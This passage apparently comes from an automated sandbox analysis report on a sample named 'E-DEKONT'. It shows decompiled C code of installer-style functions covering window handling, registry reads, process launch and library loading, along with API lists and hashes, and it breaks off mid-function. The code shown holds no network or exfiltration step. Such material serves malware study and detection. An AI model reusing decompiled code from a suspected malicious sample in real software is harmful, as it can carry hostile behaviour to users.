                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: C:\
                                                                            • API String ID: 3248276644-3404278061
                                                                            • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                            • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                                            • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                            • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040525A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 89%
                                                                            			E0040525A(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t9;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d234 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d234 = _t16;
							E00404C30();
						}
						L11:
						_t9 = CallWindowProcW( *0x42d23c, _a4, _t15, _a12, _t16); // executed
						return _t9;
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404BB0(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404263(0x413);
				return 0;
			}






                                                                            0x0040525e
                                                                            0x00405268
                                                                            0x00405284
                                                                            0x004052a6
                                                                            0x004052a9
                                                                            0x004052af
                                                                            0x004052b9
                                                                            0x004052ba
                                                                            0x004052bc
                                                                            0x004052c2
                                                                            0x004052c2
                                                                            0x004052cc
                                                                            0x004052da
                                                                            0x00000000
                                                                            0x004052da
                                                                            0x00405291
                                                                            0x004052c9
                                                                            0x004052c9
                                                                            0x00000000
                                                                            0x004052c9
                                                                            0x0040529d
                                                                            0x0040529f
                                                                            0x00000000
                                                                            0x0040529f
                                                                            0x0040526e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405275
                                                                            0x00000000

                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405289
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                                              • Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                            • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                                            • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                            • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 90%
                                                                            			E00406150(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004060EF(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                            0x0040615e
                                                                            0x00406160
                                                                            0x00406178
                                                                            0x0040617d
                                                                            0x00406182
                                                                            0x004061c0
                                                                            0x004061c0
                                                                            0x00406184
                                                                            0x00406196
                                                                            0x004061a1
                                                                            0x004061a7
                                                                            0x004061b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004061b2
                                                                            0x004061c6

                                                                            APIs
                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                                            • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: Call
                                                                            • API String ID: 3356406503-1824292864
                                                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                            • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                            • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405867 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405867(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430250->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430250,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                            0x00405870
                                                                            0x00405890
                                                                            0x00405898
                                                                            0x0040589d
                                                                            0x00000000
                                                                            0x004058a3
                                                                            0x004058a7

                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                            • CloseHandle.KERNEL32(?), ref: 0040589D
                                                                            Strings
                                                                            • Error launching installer, xrefs: 0040587A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: Error launching installer
                                                                            • API String ID: 3712363035-66219284
                                                                            • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                            • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                                            • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                            • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 60%
                                                                            			E0040202C(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fb8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E004066CB( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
					if(_t38 == _t32) {
						E004052E6(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdd4, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E00403930( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                            0x0040202c
                                                                            0x0040202c
                                                                            0x00402031
                                                                            0x00402038
                                                                            0x004020f7
                                                                            0x00402245
                                                                            0x00402245
                                                                            0x00402abf
                                                                            0x00402ac2
                                                                            0x00402ace
                                                                            0x00402ace
                                                                            0x00402047
                                                                            0x00402051
                                                                            0x00402054
                                                                            0x00402064
                                                                            0x00402068
                                                                            0x00402070
                                                                            0x00402073
                                                                            0x004020f0
                                                                            0x00000000
                                                                            0x004020f0
                                                                            0x00402075
                                                                            0x00402080
                                                                            0x00402084
                                                                            0x004020c4
                                                                            0x00402086
                                                                            0x00402089
                                                                            0x0040208c
                                                                            0x004020b8
                                                                            0x0040208e
                                                                            0x00402091
                                                                            0x0040209a
                                                                            0x0040209c
                                                                            0x0040209c
                                                                            0x0040209a
                                                                            0x0040208c
                                                                            0x004020cc
                                                                            0x004020e5
                                                                            0x004020e5
                                                                            0x00000000
                                                                            0x004020cc
                                                                            0x00402057
                                                                            0x0040205f
                                                                            0x00402062
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                                              • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                              • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                              • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E), ref: 00405341
                                                                              • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 334405425-0
                                                                            • Opcode ID: a69309817c85ba968541a9951c146186ac4bb7107100abfe604f96daf0412f93
                                                                            • Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
                                                                            • Opcode Fuzzy Hash: a69309817c85ba968541a9951c146186ac4bb7107100abfe604f96daf0412f93
                                                                            • Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 86%
                                                                            			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				short* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402C77(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402C15(3);
				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
					}
					_t24[0x3ff] = _t16;
					_push(_t22);
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}












                                                                            0x004024f2
                                                                            0x004024f2
                                                                            0x004024f2
                                                                            0x004024f7
                                                                            0x004024fe
                                                                            0x00402500
                                                                            0x00402508
                                                                            0x0040250b
                                                                            0x0040250e
                                                                            0x00402885
                                                                            0x00402514
                                                                            0x0040251c
                                                                            0x0040251f
                                                                            0x00402538
                                                                            0x0040253e
                                                                            0x00402540
                                                                            0x00402542
                                                                            0x00402542
                                                                            0x00402521
                                                                            0x00402525
                                                                            0x00402525
                                                                            0x00402549
                                                                            0x00402550
                                                                            0x00402551
                                                                            0x00402551
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                            • RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 00402538
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,00000000,00000011,00000002), ref: 00402551
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$CloseValue
                                                                            • String ID:
                                                                            • API String ID: 397863658-0
                                                                            • Opcode ID: c832eaacb46ec7e37e3c909b04b0f5a7b1d59f046349089feca9454346e38fdc
                                                                            • Instruction ID: 003629ead7c1dde4a3df59a88d33c100c9cba26094b7a58fe8a243c177e5491d
                                                                            • Opcode Fuzzy Hash: c832eaacb46ec7e37e3c909b04b0f5a7b1d59f046349089feca9454346e38fdc
                                                                            • Instruction Fuzzy Hash: 65018471904104EFE7159FA5DE89ABFB6BCEF44358F10403EF105A61D0DBB84E449B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 21%
                                                                            			E1000289C(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				long _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004050 != 0 && E1000281E(_a4) == 0) {
					 *0x10004054 = _t106;
					if( *0x1000404c != 0) {
						_t106 =  *0x1000404c;
					} else {
						E10002DE0(E10002818(), __ecx);
						 *0x1000404c = _t106;
					}
				}
				_t31 = E1000285A(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E1000284E();
					_t81 = _a4;
					_t90 =  *0x10004058;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004058 = _t81;
					E10002848();
					_t36 = SetFilePointer(??, ??, ??, ??); // executed
					 *0x10004034 = _t36;
					 *0x10004038 = _t90;
					if( *0x10004050 != 0 && E1000281E( *0x10004058) == 0) {
						 *0x1000404c = _t107;
						_t107 =  *0x10004054;
					}
					_t91 =  *0x10004058;
					_a4 = _t91;
					 *0x10004058 =  *((intOrPtr*)(E1000284E() + _t91));
					_t40 = E1000282C(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E1000285A(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E10002865() + _a4 + _v8);
							_push(E1000286F());
							if( *0x10004050 <= 0 || E1000281E(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000404c =  *0x1000404c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004058 == 0) {
						 *0x1000404c = 0;
					}
					_t94 = _a4 + E10002865();
					 *(E10002873() + _t94) =  *0x10004034;
					 *((intOrPtr*)(E10002877() + _t94)) =  *0x10004038;
					E10002887(_a4);
					if(E1000283A() != 0) {
						 *0x10004068 = GetLastError();
					}
					return _a4;
				}
				_push(E10002865() + _a4);
				_t65 = E1000286B();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E10002877();
				_t100 = E10002873();
				_t103 = E1000286F();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}


























                                                                            0x100028ac
                                                                            0x100028bd
                                                                            0x100028ca
                                                                            0x100028de
                                                                            0x100028cc
                                                                            0x100028d1
                                                                            0x100028d6
                                                                            0x100028d6
                                                                            0x100028ca
                                                                            0x100028e7
                                                                            0x100028ec
                                                                            0x100028f2
                                                                            0x10002936
                                                                            0x10002936
                                                                            0x1000293b
                                                                            0x10002940
                                                                            0x10002946
                                                                            0x10002948
                                                                            0x1000294e
                                                                            0x1000295b
                                                                            0x1000295d
                                                                            0x10002962
                                                                            0x1000296f
                                                                            0x10002982
                                                                            0x10002988
                                                                            0x1000298e
                                                                            0x1000298f
                                                                            0x10002995
                                                                            0x100029a1
                                                                            0x100029a7
                                                                            0x100029af
                                                                            0x100029b0
                                                                            0x100029b3
                                                                            0x100029be
                                                                            0x100029c0
                                                                            0x100029cc
                                                                            0x100029d2
                                                                            0x100029da
                                                                            0x10002a06
                                                                            0x10002a07
                                                                            0x10002a0d
                                                                            0x10002a0d
                                                                            0x10002a14
                                                                            0x100029ea
                                                                            0x100029ea
                                                                            0x100029eb
                                                                            0x100029f9
                                                                            0x10002a02
                                                                            0x10002a02
                                                                            0x100029da
                                                                            0x100029be
                                                                            0x10002a1d
                                                                            0x10002a1f
                                                                            0x10002a1f
                                                                            0x10002a31
                                                                            0x10002a3e
                                                                            0x10002a4c
                                                                            0x10002a52
                                                                            0x10002a60
                                                                            0x10002a68
                                                                            0x10002a68
                                                                            0x10002a76
                                                                            0x10002a76
                                                                            0x100028fd
                                                                            0x100028fe
                                                                            0x10002903
                                                                            0x10002907
                                                                            0x1000290c
                                                                            0x10002920
                                                                            0x10002921
                                                                            0x10002922
                                                                            0x10002924
                                                                            0x10002929
                                                                            0x1000292b
                                                                            0x1000292b
                                                                            0x1000292e
                                                                            0x10002934
                                                                            0x00000000

                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000), ref: 1000295B
                                                                            • GetLastError.KERNEL32 ref: 10002A62
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                            • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                            • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                            • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 84%
                                                                            			E0040247E(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402C77(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C37(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x4c) = 0x800;
					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
